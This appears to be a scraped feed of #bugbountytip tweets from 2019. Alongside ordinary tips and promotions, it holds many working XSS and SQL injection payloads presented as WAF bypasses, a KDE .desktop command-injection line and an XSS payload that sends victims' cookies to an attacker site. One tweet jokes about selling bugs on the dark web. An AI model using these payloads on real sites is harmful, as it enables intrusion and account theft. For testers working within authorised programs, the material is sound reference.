0 #Subfinder - Installation and Usage - #hackdoor #bugbounty #tutorial #bugbountytip https://t.co/gQgX9bc4ab
expl0itc0der
@vanshitmalhotra


2019-08-06 12:17:42
1 #Sublister - Installation And Usage Tutorial #bugbounty #bugbountytip #hackdoor https://t.co/hp38xeL37x
expl0itc0der
@vanshitmalhotra


2019-08-06 12:13:31
1 #OWASP #JuiceShop - Challenge / SQL Injection Tutorial #hackdoor #devops #devsecops #bugbounty #bugbountytip https://t.co/N4vjkRujJj
Pepipost
@pepi_post


2019-08-06 09:31:48
3 Send email from website using #javascript #bugbountytip https://t.co/MIzaxCbzXt
Pepipost
@pepi_post


2019-08-06 09:24:59
1 Send email to multiple recipients using AddAddress() in #phpmailer #bugbountytip https://t.co/7JklR843zt
bayani elogada
@metamudkip


2019-08-06 02:33:37
0 The lack of Access-allow-* headers disable CORS on Javascript, but not Postman. Not really a #bugbountytip but oh well
Konark Modi
@konarkmodi


2019-08-05 22:24:15
0 As always a brilliant finding by @logicbomb_1 . Btw, apart from google dork queries you can also use Common Crawl Index to increase your coverage. Example: ``` curl -sX GET "https://t.co/7l4F17TQKh" | jq -r .url | sort -u | cut -d'/' -f3 | sort | uniq ``` #bugbountytip https://t.co/MnOLHGtEg2
Dominik
@zer0pwn


2019-08-05 17:42:05
10 KDE 4/5 KDesktopFile (.desktop) Command Injection. Fits in a tweet. [Desktop Entry] Icon[$e]=$(echo${IFS}0>~/Desktop/zero.lol&) https://t.co/Iy3UPrSuhE #redteam #0day #security #bugbounty #bugbountytip #bugbountytips #kde #rce #zerodotlol #zerolol https://t.co/QRtX9Kwd1w
Petko D. Petkov
@pdp


2019-08-05 17:40:15
0 Before running youโ€™ve got to warm up. Before public speaking youโ€™ve got to warm up. But Iโ€™ve rarely seen anyone consciously taking steps to warm up before hacking. How is this any different? To get good results you need to make sure your mind is in the right state. #bugbountytip
intigriti
@intigriti


2019-08-05 14:26:22
8 According to @itscachemoney, this sometimes leads to account takeover vulnerabilities. ๐Ÿคฏ#BugBountyTip #HackWithIntigriti https://t.co/jQ84SF3tdq
Ammar Amer
@cry__pto


2019-08-05 08:00:11
1 have a questions about hacking ask the questions in the comment section . i will help you. #bugbountytip #hacking #redteam #osint #cybersecurity #infosec
Dominik
@zer0pwn


2019-08-05 03:56:03
0 KDE 4/5 KDesktopFile Command Injection. Fits in a tweet. [Desktop Entry] Icon[$e]=$(echo${IFS}0>~/Desktop/zero.lol&) https://t.co/Iy3UPrSuhE #redteam #0day #security #bugbounty #bugbountytip #bugbountytips #kde #rce #zerodotlol #zerolol https://t.co/Z49mw6rLni
Ennio Campagna
@EnnioCamp


2019-08-04 22:10:09
0 Great stream @NahamSec, every time i learn something new from your streaming ๐Ÿ™ #bugbountytip #recon
Fisher
@Regala_


2019-08-04 18:22:18
2 Mediocre hunters: fuck there is no way there is a bug on this long standing hardened target Pro hunters: pretty sure there's a bug here somewhere #bugbounty #bugbountytip
Konark Modi
@konarkmodi


2019-08-04 17:25:14
2 If you are testing access to S3 buckets and do not want to configure credentials for testing use โ€”no-sign-request. โ€˜aws s3 command S3://bucket/file โ€”no-sign-requestโ€™ #bugbountytip
/๐’…๐’†๐’—/๐’๐’–๐’๐’
@spyerror


2019-08-04 13:46:58
1 CloudFlare { XSS } Bypass Payload via dot: ๐Ÿž <--`<img/src=` onerror=confirm``> --!> #WAF #BugBounty #BugBountyTip #infosec
/๐’…๐’†๐’—/๐’๐’–๐’๐’
@spyerror


2019-08-04 10:19:52
3 Exactly this ๐Ÿ•ต๏ธโ€โ™‚๏ธ #WAF #BugBounty #BugBountyTip #infosec https://t.co/RPfTOEfvU9
Guilherme Keerok
@k33r0k


2019-08-04 01:29:45
1 XSS Cloudflare WAF bypass: <img%20id=%26%23x101;%20src=x%20onerror=%26%23x101;;alert`1`;> #bugBounty #bugbountytip
Ammar Amer
@cry__pto


2019-08-04 00:26:41
3 you can use thise tool to dynamically generate your own security (XSS,SQLI,email-format,etc,) payloads for fuzz testing: https://t.co/tONSfTriWq example: echo "<script>alert(1)</script>" | radamsa -n 5 --patterns od #bugbountytip #bugbounty #Hacking #pentest
/๐’…๐’†๐’—/๐’๐’–๐’๐’
@spyerror


2019-08-03 21:58:27
0 SQL WAF-Fail2Ban Payload via dot ๐Ÿ‘พ (SELECT 6037 FROM(SELECT COUNT(*),CONCAT(0x7176706b71,(SELECT (ELT(6037=6037,1))),0x717a717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) #WAF #BugBounty #BugBountyTip #infosec
Ammar Amer
@cry__pto


2019-08-03 21:02:35
1 you should not depend only on one tool to get the jobe done,you should always use 3 or 4 tools to make sure that you get the required/true results. thise apply to all hacking stages. like osint & scanning,,,etc. #bugbountytip #osint #Hacking
๐“š๐“ฎ๐“ท๐“ช๐“ท
@h1_kenan


2019-08-03 18:46:27
0 Gaining Shell using Server Side Template Injection (SSTI) by @davidvalles007 #bugbountytip https://t.co/07uhXW7Hza
SECARMY
@secarmyofficial


2019-08-03 18:40:30
1 ๐Ÿ˜ฑHurry Join Book Your Seats Now ๐Ÿ’ขFor Web App Pentesting Training ๐ŸŒ€Tomorrow Is Last Day Sign up to below link๐Ÿ”— https://t.co/9EPBgaPB5R #Hackers #HackerSummerCamp #HackLearning #bugbounty #bugbountytip #WebApp https://t.co/DBocFwUbUD
/๐’…๐’†๐’—/๐’๐’–๐’๐’
@spyerror


2019-08-03 17:48:25
0 XSS { Cloudflare } bypass: ๐Ÿ‘พ <a+HREF='%26%237javascrip%26%239t:alert%26lpar;document.domain)'> #WAF #BugBounty #BugBountyTip #infosec
Random Robbie
@Random_Robbie


2019-08-03 13:18:26
6 #bugbountytip - Got a LFI on a php app.... Check for sessions at /var/lib/php/session Should be easy account takeover from there :D
expl0itc0der
@vanshitmalhotra


2019-08-03 09:49:14
0 Any script/one line command on aws cli to quickly get the list of permissions enabled for s3 bucket ? @awscloud #bugbounty #bugbountytip Command - aws s3api get-bucket-acl - - bucket bucketname
Ennio Campagna
@EnnioCamp


2019-08-03 06:34:31
0 New entry!! Time to #learn ! #bugbounty #bugbountytip https://t.co/ha26xRNaET
XRSI
@XRSIdotorg


2019-08-02 18:58:40
0 Trust, Privacy and Safety will define the success of XR Technologies. Thts why #XRSI is in conversations wth industry leaders to roll out a dedicated #XR #bugbounty program, so we stay ahead of the bad guys : https://t.co/jsB7Zd2Aop. #BugBountyTip #appsec #AR #VR @ReadyHackerOne https://t.co/esWcitsv16
Andri Wahyudi ๐Ÿ•Š๏ธ โ€
@andripwn


2019-08-02 18:39:19
0 How do I open a report that has been closed by @Hacker0x01 ? but, give an impact and a very clear explanation, to open your report and become Triaged #BugBounty #BugBountyTip
/๐’…๐’†๐’—/๐’๐’–๐’๐’
@spyerror


2019-08-02 16:27:45
1 Network ~javascript execution payload: { <body onscroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus> } #WAF #BugBounty #BugBountyTip #infosec
Detectify
@detectify


2019-08-02 15:11:43
2 New blog from Crowdsource hacker @gwendallecoguic: A tutorial on bypassing Cloudflare WAF with the origin server IP address. #bugbountytip https://t.co/HvSq0iBkk9
แด‚
@pouyana1


2019-08-02 11:47:12
1 A bug on the printer and this is the result ๐Ÿ˜: #BugBountyTip #bugbounty #hacking #hack https://t.co/pd2ekxbTkf
Petko D. Petkov
@pdp


2019-08-02 11:08:00
1 Devious bug bounty tip: setup your own bug bounty program on @Hacker0x01 with solid rewards. Monitor what other hackers are doing and reflect to your targets. Muhaha #bugbountytip
emir c a
@emirca_


2019-08-02 10:32:28
0 Should we test only websites which has vulnerability bounty programs or test every possible website as we can and inform the companies? #BugBountyTip #BugBounty
Malav Sharma (Wolfdroid)
@ShMalav


2019-08-02 04:32:57
1 #bugbountytip Some people made it quite early , some took a lot of time โ€ฆ. but eventually they all made it โ€ฆ Its just about your curiosity and hard work and most important keep doing it .. never leave the field
Mo'men Basel
@Momenbassel


2019-08-02 02:57:09
0 pyRobots: a tool that reads "robots.txt" file and appends each path to the domain/subdomain you entered. https://t.co/S8hs6cdXxF #bugbountytips #python #BugBounty #BugBountyTip https://t.co/yeLvkcCUeo
Pavandeep
@Pavandep8


2019-08-01 17:29:00
1 Look what I shared: Bypassing CORS - #Hacker #hackers #BugBountyTip #BugBounty @MIUI| https://t.co/Q8f8YDZhf5
๐“š๐“ฎ๐“ท๐“ช๐“ท
@h1_kenan


2019-08-01 16:00:56
8 I will show you the real impact of the #XSS #BugBountyTip #security when you find the reflection use payload: on[whatevereventworks]= "location=`http://attackersitecom/?`+cookie"> attackersite will get user cookies. this is how XSS works!
emir c a
@emirca_


2019-08-01 12:36:03
0 Searching for XSS vulnerabilities all day and night. Still couldn't find anything. Maybe looking the wrong place with wrong keys. #BugBounty #BugBountyTip
Bogdan Bodishtyanu
@xalerafera


2019-08-01 12:34:52
0 If you come across requests with the OPTIONS method, do not miss them. Try changing them to the GET method and try to find XSS and SQL injection vulnerabilities! Good luck for hunting. #BugBountyTip #Hacker0x01 #TogetherWeHitHarder https://t.co/8ZsBWwzJ3O
/๐’…๐’†๐’—/๐’๐’–๐’๐’
@spyerror


2019-08-01 12:21:36
3 Another way to use throw without a semi-colon: ๐Ÿ‘พ <script /***/>~/***/confirm(ยด\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450ยด~)/***/</script /***/ #WAF #BugBounty #BugBountyTip #infosec
Imran Parray
@CreedHackers


2019-08-01 12:03:17
4 Steal it like you own it. #TIP: 1- Collect endpoints/parameters from the API request. 2- Make a Brute-force List . 3-Now use that list to recursively bruteforce all the API endpoint. #BugBountyTip #infosec #Cybersecurity @Bugcrowd https://t.co/HGqFYKSOQs
/๐’…๐’†๐’—/๐’๐’–๐’๐’
@spyerror


2019-08-01 10:41:54
1 Unusual data load encrypted with Base64 can be useful when passing through a web firewall filter. ๐Ÿ‘พ <svg/onload=location=window[`atob`]`amF2YXNjcmlwdDphbGVydCgxKQ==`;//> #WAF #BugBounty #BugBountyTip #infosec
expl0itc0der
@vanshitmalhotra


2019-08-01 10:14:22
0 #BugBountyTip โ€” Follow reddit/r/bugbounty ! Interesting #BugBounty writeups shared almost every day !
๐“š๐“ฎ๐“ท๐“ช๐“ท
@h1_kenan


2019-08-01 09:39:41
0 100 people did it wrong ๐Ÿ˜‚ always try to play with token, sometimes server side, it isn't checked properly #BugBountyTip https://t.co/ouioxKziDq
Jason Sewell
@sewell_jason


2019-08-01 08:31:31
0 TFW you know you're in a #docker container. #pentesting #BugBountyTip https://t.co/SfA0p6ERZx
Ammar Amer
@cry__pto


2019-08-01 08:01:39
2 the best BugBounty books to read. consider them one book. real world bughunting:will learn you how to find bugs based on real world reports Bug Bounty Hunting Essentials;will learn you how to find bugs based on practical effective pentesting methods. #BugBountyTip #BugBounty https://t.co/3vZcTV80E8
SaadAhmed
@XSaadAhmedX


2019-08-01 07:02:26
7 Here Is the Write-up how I bypass the CORS to steal the victim account information ๐Ÿง๐Ÿง https://t.co/Z95XcdIAKx #bugbountytip #bugbountytips #bugbounty @Bugcrowd
แด‚
@pouyana1


2019-08-01 03:21:17
0 found a bug in microsoft outlook web app : everyone sends me an email, the mail won't deliver and he/she will automatically sign out after that ๐Ÿ˜‚๐Ÿ˜‚ will make a video for it soon #bugbounty #BugBountyTip #infosec #Microsoft #hack #hacking
/๐’…๐’†๐’—/๐’๐’–๐’๐’
@spyerror


2019-08-01 00:13:26
1 XSS load has been found interesting but effective: " onclick=alert()//<button ' onclick=alert()//> */ alert()//<img style="background-url=eval(onclick)" onclick=alert()>//> #WAF #BugBounty #BugBountyTip #infosec https://t.co/gxXVGVvV3w
/๐’…๐’†๐’—/๐’๐’–๐’๐’
@spyerror


2019-07-31 23:56:33
0 Interesting XSS For example, enter where Id = 123 is reflected in the JSON body inside the code label. ? If you send id = </ script>, the application will delete the entry. This,? Id ["</ script>"] = 123 can be skipped. #WAF #BugBounty #BugBountyTip #infosec #developer https://t.co/f3RMj0nTce
/๐’…๐’†๐’—/๐’๐’–๐’๐’
@spyerror


2019-07-31 22:50:37
0 Xss using css: <style>img{background-image:url('javascript:alert(1)')}</style> Firewall bypass: <style>*{background-image:url('\6A\61\76\61\73\63\72\69\70\74\3A\61\6C\65\72\74\28\6C\6F\63\61\74\69\6F\6E\29')}</style> #WAF #BugBounty #BugBountyTip #infosec
/๐’…๐’†๐’—/๐’๐’–๐’๐’
@spyerror


2019-07-31 21:06:47
1 @brutelogic { XSS } test results in successful payload bro. https://t.co/pFNM1awbI5</script><svg><script>alert(1337)%0A--> #payload #BugBounty #BugBountyTip #WAF
/๐’…๐’†๐’—/๐’๐’–๐’๐’
@spyerror


2019-07-31 20:58:06
0 Another bypass DotDefender WAF ๐Ÿ‘พ <bleh/ondragstart=	parent	['open']	()%20draggable=True>dragme #WAF #BugBounty #BugBountyTip #infosec
Andri Wahyudi ๐Ÿ•Š๏ธ โ€
@andripwn


2019-07-31 20:35:20
1 Skip XSS filters with CloudFlare{}; ๐Ÿ˜Š <select><noembed></select><script x='[email protected]'a>y='[email protected]'//[email protected]%0a\u0061lert(1)</script x> #WAF #BugBounty #BugBountyTip
/๐’…๐’†๐’—/๐’๐’–๐’๐’
@spyerror


2019-07-31 18:43:01
1 R.I.P. Fixed a chip with bypass cloud glare. ๐Ÿ’‰ but also jumps {cloudflare}: '"><iframe srcdoc='%26lt;script>;prompt${document.domain}%26lt;/script>'> #WAF #BugBounty #BugBountyTip #infosec #bypass #vulnerability #security #exploit
Mohammed Rishin
@mohd_rishin


2019-07-31 17:27:30
1 This bug allowed everyone to apply for #Google CEO's position . #Googlejob #HiringNow #hiring #LinkedIn #bug #bugbountytip #dataprivacy #jobseekers #job #fraud #marketing #business #entrepreneur #organization Read More: http: https://t.co/rlE7n7PnRi
/๐’…๐’†๐’—/๐’๐’–๐’๐’
@spyerror


2019-07-31 16:25:38
0 Another { WAF CloudFlare bypass } that works on angle brackets and looks like it: It can work without an iframe. It's not fixed yet. ๐Ÿ•ธ๏ธ xss'"><iframe srcdoc='%26lt;script>;alert(1)%26lt;/script>'> #WAF #BugBounty #BugBountyTip #infosec
Dhamu
@Dhamuharker


2019-07-31 15:53:21
0 #bugbountytips #BugBounty #bugbountytip #ItTakesACrowd #TogetherWeHitHarder If you are able to exploit Apache | Server Status try these things, you may end up getting the Server Status Access GET /server-status/common.htm https://t.co/GqiZVfFDgR
/๐’…๐’†๐’—/๐’๐’–๐’๐’
@spyerror


2019-07-31 14:14:45
2 { ontouch * } handlers for mobile XSS ๐Ÿง <body ontouchstart=alert(1)> <body ontouchend=alert(1)> <body ontouchmove=alert(1)> #WAF #BugBounty #BugBountyTip #infosec
BarMosseri
@MosseriBar


2019-07-31 14:02:16
0 Looking for someone to do with him bounty #bugbountytip
/๐’…๐’†๐’—/๐’๐’–๐’๐’
@spyerror


2019-07-31 13:55:36
0 To include an image via url: Enter #payload: { https://x onerror=alert(1) }; #WAF #BugBounty #BugBountyTip #infosec https://t.co/8pKwE3FaIq
intigriti
@intigriti


2019-07-31 11:55:17
0 Tip of the day: check for exposed Slack tokens using @streaak's #BugBountyTip and find out if hackers could have been snooping on your Slack conversations. ๐Ÿ‘€ https://t.co/jh41qZJkgb
Petko D. Petkov
@pdp


2019-07-31 11:52:12
0 One of my critical issues (disclosure of credentials and API tokens) was just downgraded to Low because it affects non-prod environments. Obviously I disagree but such is life. $250 #bugbountytip
/๐’…๐’†๐’—/๐’๐’–๐’๐’
@spyerror


2019-07-31 11:42:34
0 CloudFront XSS bypass: <--`<img%2fsrc%3d` onerror%3dalert(document.domain)> --!> #WAF #BugBounty #BugBountyTip
expl0itc0der
@vanshitmalhotra


2019-07-31 11:14:39
3 Faxploit: Breaking the Unthinkable https://t.co/I0erESpyd7 Follow Us for Cyber Security Trainings https://t.co/iNczOcGmCt #bugbounty #bugbountytip #penetrationtesting #pentesting #devops #devsecops #hacking
expl0itc0der
@vanshitmalhotra


2019-07-31 11:07:14
1 The Art of Man-in-the-Middle Attack https://t.co/XNvtS3duJ1 #bugBounty #bugbountytip #penetrationtesting #devops #devsecops #hacking #training #securitytraining #ceh
/๐’…๐’†๐’—/๐’๐’–๐’๐’
@spyerror


2019-07-31 10:34:39
0 {xSS}; payload to ByPass CloudFlare protection. <body \< onscroll =1(_=prompt,_(String.fromCharCode(88,83,83,32,66,121,32,77,111,114,112,104,105,110,101)))> #WAF #BugBounty #BugBountyTip
max_shah_aqi
@aqibshah


2019-07-31 07:53:21
1 #Bugbountytip: To include an image via url: Enter #payload: https://x onerror=alert(1) #xss #BugBounty https://t.co/GGTm3PH1m1
/๐’…๐’†๐’—/๐’๐’–๐’๐’
@spyerror


2019-07-31 07:50:24
2 Cloudflare #XSS #Bypass via dot ๐Ÿ˜Ž "<BODY onload!#$%&()*~+-_.###:;[email protected][/|\]^`=alert(โ€œXSSโ€)>" #WAF #BugBounty #BugBountyTip
Ammar Amer
@cry__pto


2019-07-30 23:45:02
2 html injection and content spoofing in the wild: -WITHIN SECURITY CONTENT SPOOFING: https://t.co/s7Xbpfrmgd -HACKERONE UNINTENDED HTML INCLUDE FIX BYPASS: https://t.co/lBF8pNKZP9 -THROUGH CHARACTER ENCODING: https://t.co/6W1u73x52P #bugbountytip #Hacking #Pentesting
m0z
@LooseSecurity


2019-07-30 23:34:54
1 #BugBounty #bugbountytip #bugbountytips #infosec Yes, CRLF injection "exists", but don't waste time on it. I see a lot of people trying to get header injection via CRLFs and it's really not going to happen... It's so rare these days. Your time is better spent on something else.
Navneet
@na5n33t


2019-07-30 19:26:07
1 Team adds the token parameter to avoid CSRF but forget to check even presence of token parameter is mandatory or not. ๐Ÿ˜… I removed the token parameter and CSRF works as charm. ๐Ÿ™ŠThen look for other request and it also acts same ๐Ÿ™Š #bugbounty #bugbountytip #infosec
(((Gamliel)))
@Gamliel_InfoSec


2019-07-30 19:17:10
0 "Always go for the highest impact!" -Hussein Daher #bugbounty #bugbountytips #bugbountytip https://t.co/2O5NWuPVLu
Ashish Kunwar
@D0rkerDevil


2019-07-30 18:10:51
0 #bugbountytip: look into feedback forms and contact-us forms for smtp injection
SECARMY
@secarmyofficial


2019-07-30 17:17:26
0 Check out our Introduction to Our Bug Bounty Course Watch on Youtube Now https://t.co/EQPAUJUJ8c #wearesecarmy #bugbounty #bugbountytip #hacking #training #infosec https://t.co/NJgwu5upbH
Ammar Amer
@cry__pto


2019-07-30 14:58:00
1 new articles as a pdf files has been uploaded to my github. repository,the number of articles will continue to get higher until it reach 2000 articles as a pdf files the path to new articles https://t.co/gtsrUpWfF6 #bugbountytip #BugBounty #OSINT #Hacking #PenTest #CyberSecurity https://t.co/U4YyF3zRqa
miraitowa
@miraitowa1


2019-07-30 12:45:07
0 Thank you very much for sharing. I look forward to your next [email protected] #BugBounty #bugbountytip Live Bug Bounty Recon Session on Yahoo (Part 1 - 7/14/2019) https://t.co/0DbMDbOSHR via
miraitowa
@miraitowa1


2019-07-30 11:18:18
8 SSRF Trick: SSRF/XSPA in Microsoftโ€™s Bing Webmaster Central by Elber Andre #bugbounty #bugbountytip #SSRF https://t.co/WDDlxRSUh2
Deepak Holani
@w_hat_boy


2019-07-30 07:58:38
0 #bugbountytip : Sometime when u come across for specific features but for that u have to pay just go on Google images type company name .. some people put images that that contain end point url which is not under demo feature ..but contain in full specific fetaures
mAshraf
@mAshraf9_


2019-07-30 07:54:07
0 As long as it is a program, a bug may appear. #infosec #BugBounty #bugbountytip #bugbountytips
RHack
@Queseguridad


2019-07-29 23:11:58
0 Akamai Bypass "><marquee%20loop=1%20width=0%20ontoggle=confirm=prompt`${1}`> Imperva Bypass "><details%20open%20ontoggle=confirm(1)> #bugbountytip #bugbountytips #akamaibypass #impervabypass
Jagannath
@SecurityBoy0x01


2019-07-29 15:22:32
0 Spawning a shell : https://t.co/yDo6mISHKt #infosec #bugbountytip #cybersecurity
Jagannath
@SecurityBoy0x01


2019-07-29 15:06:26
1 As I learn about PCI-DSS, I am collating the notes as I go. Here are they if you are interested. https://t.co/QayaJkJVDZ #PCI_DSS #infosec #dataprivacy #bugbountytip
Wh11teW0lf
@Wh11teW0lf


2019-07-29 13:33:36
0 #BugBounty #bugbountytip #bugbountytips # Don't forget for console.log() if alert()/confirm()/prompt() are blocking!
/๐’…๐’†๐’—/๐’๐’–๐’๐’
@spyerror


2019-07-29 10:58:18
0 Skip XSS filters with CloudFlare{}; ๐Ÿ˜Š <select><noembed></select><script x='[email protected]'a>y='[email protected]'//[email protected]%0a\u0061lert(1)</script x> #WAF #BugBounty #BugBountyTip
/๐’…๐’†๐’—/๐’๐’–๐’๐’
@spyerror


2019-07-29 07:50:42
0 (&& = %26%26) sql injection "and" filter bypass %26%26 1=1 #WAF #BugBounty #BugBountyTip #injection #Bypass
/๐’…๐’†๐’—/๐’๐’–๐’๐’
@spyerror


2019-07-28 23:39:07
1 Chrome XSS byPass: %00%00%00%00%00%00%00<script%20src=(link: https://t.co/Tek0Fh9NMv) https://t.co/Tek0Fh9NMv ></script> #WAF #BugBounty #BugBountyTip
Sul will be at BlackHat
@pwnb0xes


2019-07-28 23:22:54
0 If a company isn't paying enough for your bug bounty take it to the dark web to get paid! #HIPHOPMUSIC #infosec #bugbountytip #getpaid
Aziz Hakim๐Ÿ‡ง๐Ÿ‡ฉ
@hackerb0y_


2019-07-28 21:18:20
0 While hunting a program I got an admin panel sub, eg: https://t.co/2iAH1i18kT Tried many way to bypass but couldn't succeed! Then entered main program's login info and clicked into login! Guess what? It took me to Admin Panel ๐Ÿค™ #infosec #bugbountytip #BbWorld19 #bugbounty
MrB0LTv2 (เฎคเฎฎเฎฟเฎดเฎฉเฏ)
@MrB0LTv2


2019-07-28 15:15:39
0 A little reward to a lazy guy for his lazy progress.!!๐Ÿ˜… Hopefully, Rewards crossed 1st 1000โ‚ฌ!!๐Ÿ˜‹ Thnks @YogoshaOfficial ๐Ÿ˜ #bugbountytip = Some things will take time!! And Patience matters..!! #bugbounty #We โค๏ธ #เฎคเฎฎเฎฟเฎดเฎฉเฏ https://t.co/Bk2UeLp5eX
baluz
@haknfuk


2019-07-28 14:51:23
0 @MrB0LTv2 i lik that #bugbountytip
MrB0LTv2 (เฎคเฎฎเฎฟเฎดเฎฉเฏ)
@MrB0LTv2


2019-07-28 14:44:23
0 A little reward to a lazy guy for his lazy progress.!!๐Ÿ˜… Hopefully, Rewards crossed First 1000โ‚ฌ Euros!!๐Ÿ˜‹ Thanks to all my well-wishers๐Ÿ˜ and yogosha.official ๐Ÿ˜ #bugbountytip = Some things will take time!! Andโ€ฆ https://t.co/iKQCiQ4wxy
Demolalagos๐ŸŒ
@Demolalagos1


2019-07-28 14:44:05
0 #bugbountytip If wappalyzer is showing the latest angular version of the site don't think of not getting xss bypass , I used angular xss payload v 1.3.2 on a website using angular js v1.6.4 . Developers does makes mistakes... Hope you like the tip. Happy hacking
Ammar Amer
@cry__pto


2019-07-28 11:44:40
2 when you see a Registration page, during a web pentesting operation you should try discover if you can enumerate usernames by trying to register with an existing username. #bugbountytip #BugBounty
Navneet
@na5n33t


2019-07-28 07:59:50
0 The website is protecting the CSRF by checking the Referer header and then this bypass helps. Successfully bypassed and submitted. Let's hope for the bounty. ๐Ÿ˜„๐Ÿ˜… #bugbounty #bugbountytip #infosec โ€œ[Critical] Bypass CSRF protection on IBMโ€ by Mohamed Sayed https://t.co/ZOB0m0odX5
Malav Sharma (Wolfdroid)
@ShMalav


2019-07-28 04:46:13
0 #bugbountytip trust me if it's that easy, everybody would be doing it .
Minture
@minturebr


2019-07-28 01:12:59
0 Use tweetdeck to keep an eye on new writeup, tweets, posts. #bugbountytip #bugbountytips #hacking
m0z
@LooseSecurity


2019-07-28 01:02:19
4 #bugbountytip #bugbountytips #infosec #infosecurity Instead of always using <img src=x onerror=alert(0)> why not try: <audio src=x onerror=alert(0)> <video src=x onerror=alert(0)> Or my favorite: <script src=x onerror=alert(0)>
Malav Sharma (Wolfdroid)
@ShMalav


2019-07-27 15:42:19
0 #bugbountytip If wappalyzer is showing the latest angular version of the site don't think of not getting xss bypass , I used angular xss payload v 1.3.2 on a website using angular js v1.6.4 . Developers does makes mistakes... Hope you like the tip. Happy hacking
Romansh yadav
@Romanshyadav


2019-07-27 14:10:28
8 Think better!. Book your pass for @bsidesahmedabad on early bird discount now. Pass link: https://t.co/psZDqWoxSt cc: @SecurityBSides @niksthehacker @dipenwadhwa @H4ck3rVishal @InfosecVandana @emgeekboy #conference #workshop #Hackers #bugbountytip #researcher https://t.co/adotzHI76s
Max
@0xw2w


2019-07-27 12:59:31
0 Tip: If you have an API endpoint like /api/v2/****/, try to substitute v* with a less number and look at the reaction. Maybe there is an IDOR or improper auth bug #bugbountytip
JR0ch17
@JR0ch17


2019-07-27 06:26:58
1 #bugbountytip for me tonight is always check if I have an upstream proxy server configured in Burp๐Ÿ˜…
vavkamil
@vavkamil


2019-07-26 18:10:51
0 XSSwagger v0.1 for detecting old Swagger UI versions vulnerable to XSS attacks #bugbounty #bugbountytip https://t.co/1sKKF9Jusn
Petko D. Petkov
@pdp


2019-07-26 17:42:11
2 Everyone is looking for XSS, SQLI, RCE and SSRF. You might get lucky but you are competing with the world. To be successful at bug bounty hunting one should look for those things no one else is looking for, which may seem harder but actually not hard at all. #bugbountytip
mAshraf
@mAshraf9_


2019-07-26 15:00:47
1 When they say the greatest vulnerability in a SDLC is human beings, they mean there will always be a bug there.๐Ÿ˜‹๐Ÿ˜‹ #infosec #BugBounty #bughunter #bugbountytip
bl4ckh4ck5
@bl4ckh4ck5


2019-07-26 12:46:05
0 @intigriti i shortly ago repported a clickjacking as high because it led to sensitive data exposure. just make the transparacy of the iframe very low and let him steal his own information using ctrl+a and ctrl+c and place that in a sepret input field. make it as a game ;) #bugbountytip
SecuNinja
@secuninja


2019-07-26 11:38:25
0 when <svg/onload=alert(1)> is not working, try without forward slash and add a whitespace <svg onload=alert(1)> #bugbountytip
Dhamu
@Dhamuharker


2019-07-26 11:02:24
0 Oracle WebLogic Server Remote Command Execution #bugbountytips #exploits #webappsec #BugBounty #bugbountytip #ItTakesACrowd #togetherwehitharder https://t.co/Vx9MVr0olN
Yatin Sharma
@Iam_yatin


2019-07-26 07:26:03
0 Seats are filling so fast. Don't wait ! Grab your @bsidesahmedabad seat now on early bird discount. https://t.co/UWTb7gRxXJ #Conference #workshops #Hacker #bugbountytip #researchers CC: @SecurityBSides @niksthehacker @H4ck3rVishal @dipenwadhwa https://t.co/AID3v5Thnx
Romansh yadav
@Romanshyadav


2019-07-26 06:55:03
1 Seats are filling so fast. Don't wait ! Grab your @bsidesahmedabad seat now on early bird discount. https://t.co/psZDqWoxSt #Conference #workshops #Hacker #bugbountytip #researchers CC: @SecurityBSides @niksthehacker @H4ck3rVishal @dipenwadhwa https://t.co/YUj5U0dvxd
m0z
@LooseSecurity


2019-07-25 15:53:43
0 #BugBounty #bugbountytip #bugbountytips #infosec I think it's worth replacing alert(0) in all your payloads with prompt `0` as it's an easy way to increase the probability of getting a successful #XSS vulnerability!
{{ '127.0.0.1โ€™}}
@shivam31200


2019-07-25 15:36:32
0 So here <script> alert(1)</script> was popping 1 after trying to steal cookie via this <script> alert(document.cookie)</script> Not working :/ Final payload: <script> alert(1)</script> <script> alert(document.cookie)</script> It will popup user cookie #bugbountytip noobtip
Michele Romano
@Mik317_


2019-07-25 14:04:13
0 TIP: If you don't like small scopes, explore also `out-of-scope` subdomains ... you could find juicy endpoints containing CRLF/XSSI issues, that can be used to achieve a concrete impact also on the main domain :) #bugbountytip #BugBounty #bugbountytips (last one: now)
vavkamil
@vavkamil


2019-07-25 11:09:04
1 XSS ontouch* for mobile #bugbountytip https://t.co/WWyNp0FtYu
Petko D. Petkov
@pdp


2019-07-25 07:17:36
0 Reported vulnerability which allows me to takeover corporate accounts, access email and so on - flagged as informative. You are amateurs. #bugbountytip
h3rm17w0lf
@h3rm17w0lf


2019-07-25 05:15:17
0 Every came across a bug that made you sleepless until you exploited it ? I am working on one such and havenโ€™t had a good sleep since two nights. #BugBounty #bugbountytip
Sarvagya Sagar
@0ffensivemitthu


2019-07-25 00:48:57
0 [ #bugbounty #bugbountytip ] - Oauth Hacks ๐Ÿ’ฐ RFC6819 : https://t.co/8NNpx9sqgN Video : https://t.co/t7oarM6fc6 Writeup : https://t.co/que1GGgBK7 or https://t.co/cIRzuyGO7k or https://t.co/tvwk5MPhSq Cheatsheet : https://t.co/KZxpCODZ3L
plenum ๐Ÿ‡น๐Ÿ‡ณ
@plenumlab


2019-07-25 00:14:25
1 #bugbountytip when looking for priv esc read the api docs jump to old versions look for interesting calls and watch out for deprecated api endpoints sometimes they continue to use them for backward compatibility. Some functions like invite, join, create, delete... #BugBounty
Ammar Amer
@cry__pto


2019-07-24 22:30:49
1 you can use the fragments plugin in the WebScarab proxy. to identify the comments in the html source code which may contain useful/sensitve info for the pentester,an easy&fast way to search through the entire source code and find comments. #bugbountytip
pi0wlz
@pi0wlz


2019-07-24 17:29:37
0 if u use gobuster tool for dns enumuration like $ gobuster dns -d https://t.co/ixNnyR6gG7 -t 100 -w common-names.txt -o gobuster-findings, u can parse the output with $ cat gobuster-findings | sed 's/Found: //' > filter.txt #bugbountytip
BarMosseri
@MosseriBar


2019-07-24 14:36:58
0 When you got xss on Hyatt service :) #bugbountytip https://t.co/1oFu9K2Yyr
m0z
@LooseSecurity


2019-07-24 13:47:10
4 One of my favorite #XSS payloads of ALL TIME!!! <input/onfocus=alert(0) autofocus> Perfect for injecting inside of input tags, abusing the 'autofocus' attribute by combining it to an 'onfocus' event handler. #BugBounty #bugbountytip #bugbountytips #infosec #infosecurity
Pedro Henrique Cardoso
@G4L1C


